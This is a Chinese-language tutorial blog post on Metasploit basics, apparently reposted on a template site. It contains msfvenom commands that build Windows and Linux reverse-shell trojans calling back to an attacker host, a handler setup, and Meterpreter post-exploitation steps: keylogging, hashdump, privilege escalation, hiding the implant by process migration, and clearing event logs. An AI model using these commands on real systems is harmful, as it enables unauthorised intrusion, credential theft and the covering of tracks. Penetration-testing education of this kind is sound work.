渗透测试神器-msf基础

这篇具有很好参考价值的文章主要介绍了渗透测试神器-msf基础。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Msf基础

Metasploit-framework(用ruby写的)基础:

渗透测试神器-msf基础

MSF拥有世界上最大的渗透测试攻击数据库

Vulnerability:漏洞统称

expoit:攻击代码或者程序

Payload:完成实际攻击功能的代码

module:组成完整系统的基本构造块,每个模块执行特定任务

运行msf:

    1.sudo service postgresql start(开启数据库)

    2.msfconsole

msf架构:

渗透测试神器-msf基础

msf模块介绍:

Exploit:msf最核心的模块,里面有针对不同操作系统不同服务的攻击,包括mac和andriod

encoders没啥用,编码,自己提供编码倒是可以

evasion:免杀,也没啥用,现在免杀也免不了被杀

Ms17-010:ms指微软17-010指17年编号010的漏洞

渗透测试神器-msf基础

msf的基本命令:

命令 说明
Use 选择渗透攻击模块
Show payloads 查看与该攻击模块相兼容的攻击载荷
Set payloads 设置攻击载荷
Set target 设置目标
Show options 查看需要设置的配置参数
Exploit 实施渗透测试攻击

注意:metasploit渗透攻击模块在目录:/usr/share/metasploit-framework/modules/exploits

msf直接渗透

1、根据模块搜集exp:search module

2、根据需要攻击的模块,use切换到对应的expolit内,然后show options查看需要配置的内容

required显示为yes就是必须要配置的服务

445是smb服务,是windows一定会开启的服务

3、set rhosts ip(也可以指定文件)配置攻击ip

4、下面两种payload是show payload查出来的,每个不同的攻击expolit有自己的payloads

Linux(windows)/x64/meterpreter/bind_ipv6_tcp是(带bind)在服务器开放一个端口等待我方攻击机连接

Linux(windows)/x64/meterpreter/reverse_name_pipe是(带reverse)是在本地开放一个端口,等待被控服务器主动连接

上述两种最后的name_pipe,ipv6_tcp,tcp,tcp_rc4的等是指连接的协议

5、set payload Linux(windows)/x64/meterpreter/reverse_name_pipe配置载荷

Show options查看需要设置的内容

所以msf远控是先配置expolit,再配置payload

流程为:
search module --> use expolit --> show options --> 配置exp --> show payloads --> set payload … --> show options --> 配置payloads --> expolit

msf的攻击原理:

渗透测试神器-msf基础

看[*]是攻击过程:先是在本机开放4444端口

然后调用auxiliary的辅助模块进行扫描

扫描到一台存活的主机,开始攻击

标红代表攻击失败

二、msf远控功能:

命令:msfvenom

生成一个被控端的exe程序,在服务器上的木马程序

Msf -I payloads列出所有的payload

Msfvenom --list plantform查看支持生成木马的平台

生成针对windows的远控木马:

1、msfvenom生成木马

Msfvenom -p 指定payload LHOST=攻击机ip地址(别用127.0.0.1) LPORT=连接端口号 -f指定payload输出格式>输出位置和名字

比如:生成windows下反弹shell的木马:

Msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机ip地址> LPORT=<连接端口号> -f exe > name.exe

生成linux下反弹shell的木马:

Msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<攻击机ip地址> LPORT=<连接端口号> -f elf > name.elf

此处生成的木马是上传至靶机的,所以msfvenom指定的payload要与show options设定的payload一致

2、将木马上传至目标机

3、在msfconsole中进行监听反弹的shell

开启metasploit设置监听参数:

    ①在metaspolit中使用handler为主动端,hander在exploit/multi

    ②设置payload,和前面制作木马时使用的payload一致

    ③设置lhost和lport(和前面制作木马的参数一样)

    ④expolit监听,等待被控端打开木马

渗透测试神器-msf基础
如果攻击成功,会显示开启session会话

Sessions -l显示开启的session

msf的payload是分两段发送的,先发送核心payload,然后再用这段核心payload下载其他payload,如果连接失败,就会只存在核心payload

监听成功后,shell进入靶机终端

还有很多命令,screenshot截图,keyscan_start开启键盘监听,mouse鼠标等等

lcd切换本地路径

upload src . 把src文件上传到靶机当前目录,用来上传后续文件

meterpreter概述

介绍:

·Meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。

·例如∶利用远程过程调用(RPC)服务的一个漏洞,当漏洞触发后,我们选择Meterpreter作为攻击载荷,就能够取得目标系统上的一个Meterpreter Shell连接。

·Meterpreter是Metasploit框架的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更为深入的渗透,这些功能包括反追踪、纯内存工作模式、密码哈希获取、特权提升、跳板攻击等等

技术优势∶

·Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台。

·Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。

·另外,Meterpreter还提供了基于PHP和Java语言的实现。

Reverse_tcp:

渗透测试神器-msf基础

渗透测试神器-msf基础

meterpreter基本命令
background 将meterpreter终端隐藏在后台
sessions 查看已经成功获取的会话,sessions -i继续与某会话交互
shell 直接获取系统控制台的shell
irb 在会话里与Ruby终端进行交互
cat 查看文件内容
getwd 获得目标机当前的工作目录
upload 上传文件
download 下载文件
edit 调用vi编辑器编辑
search 对远程目标机上的文件进行搜索(-d指定其实目录,-f指定搜索文件或者部分文件名)
隐藏木马方法:进程注入(需要有最高权限)

ps显示当前进程

Migrate -P pid把当前木马进程迁移至pid,通常迁移至系统程序,因为随着迁移程序的关闭,木马也会随之关闭

Session -j -z挂起监听模式,也就是可以继续执行任务,并在后台监听

在攻击完成后,clearev清除事件日志

其他各种实用命令:

getsystem尝试提权
play播放音乐
portwd端口转发
execute执行文件
sysinfo得到目标系统的一些信息
shutdown关闭目标主机系统程序,因为随着迁移程序的关闭,木马也会随之关闭
mouse click 鼠标左击
mouse rightclick 1 1 在x=1,y=1坐标轴上鼠标右击
hashdump获取账号
getpid 获取当前会话的PID值
kill 终结PID进程
getuid 获得运行meterpreter会话的用户名,查看权限文章来源地址https://www.toymoban.com/news/detail-446574.html

到了这里,关于渗透测试神器-msf基础的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Metasploit Framework(MSF)基础框架

    Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 常见名词解释: POC : Proof of Concept ,概念证明,用来证明漏洞存在的一段代码,没有攻击性

    2024年02月08日
    浏览(30)
  • Metasploit渗透测试框架

    一下笔记为观看课程得出https://www.bilibili.com/video/BV127411c7yE?p=6spm_id_from=pageDrivervd_source=5294f3174c841de416fef55d145e1e28 基于TCP协议收集主机信息 开放端口扫描db_nmap 查询网段内在线存活的主机 展示效果查询结果如下: 半连接的方式进行半连接扫描 使用auxiliary/sniffer下的psunffle模块进

    2024年02月10日
    浏览(40)
  • 白帽子学习——Metasploit渗透测试指南

    根据pdf,总结自己认为比较重要的,欢迎大佬指错。 1.1专业术语 1.1.1渗透攻击(Exploit) 由攻击者或渗透测试者利用一个系统、应用或服务中心的安全漏洞进行的攻击行为。往往会造成开发者所没有预期到的一种特殊结果。 1.1.2攻击载荷(Payload) 目标系统在被渗透攻击之后

    2023年04月08日
    浏览(23)
  • 精通METASPLOIT渗透测试(第3版)自建docker靶场

    首先要感谢原书作者及国内译者(哈哈哈),书有了,但是靶场没有,给的GITHUB里也只是写payload片段,没有靶机看着确实无聊。自己动手做吧。开始是用的安装方式,但是这个无法分享。还是做成docker吧。我会做一个发一个。有些因为涉及提权,我还是按照书上建议的操作系

    2024年01月18日
    浏览(30)
  • Kali Linux渗透测试小实践——Metasploit与后门木马

    目录 一、环境和工具准备 1.Metasploit 2.Kali Linux与靶机 二、实践过程 1.打开Kali Linux,进入终端 2.输入生成木马的命令,并配置相关参数 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评

    2024年02月13日
    浏览(31)
  • [课业] | 软件安全 | 使用渗透性工具Metasploit进行漏洞测试

    1.1 渗透测试技术的核心思想 渗透测试(Penetration Test)技术的核心思想是模仿黑客的特定攻击行为,也就是尽可能完整地模拟黑客使用的漏洞发现技术和攻击手段,对目标的安全性做深入的探测,发现系统最脆弱环节的过程。 渗透测试可以选择使用自动化测试工具,测试人员的

    2024年02月04日
    浏览(47)
  • 详尽的msf——meterpreter——渗透测试教程

    本文仅供学习参考使用,切勿用于非法事情!! 众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。 现在发现msf很厉害,可以在它的基础上开发。 msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期

    2023年04月15日
    浏览(33)
  • 进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

    数据来源   本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。  得到ip地址我们能干嘛?         首先进行端口扫描 为什么要进行端口扫描?         端口扫描的作用就是发现目

    2024年02月06日
    浏览(42)
  • 内网渗透测试 MSF搭建socks代理

    最终效果为如此,web服务器可以ping通外网和内网两台服务器     信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 现在咱们查询一下日志功能是否开启,默认是关闭的。 show variables like \\\"general_log%\\\"; 命令行 set globalgeneral_log=\\\'on\\\'; 图形化: 输入一句话木马并执行,使日志

    2023年04月08日
    浏览(34)
  • 【2023最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了

    Metasploit 官方介绍 Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。 Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。 今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit,使用框架以及利用漏洞。 下载地址:https://

    2024年02月13日
    浏览(57)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包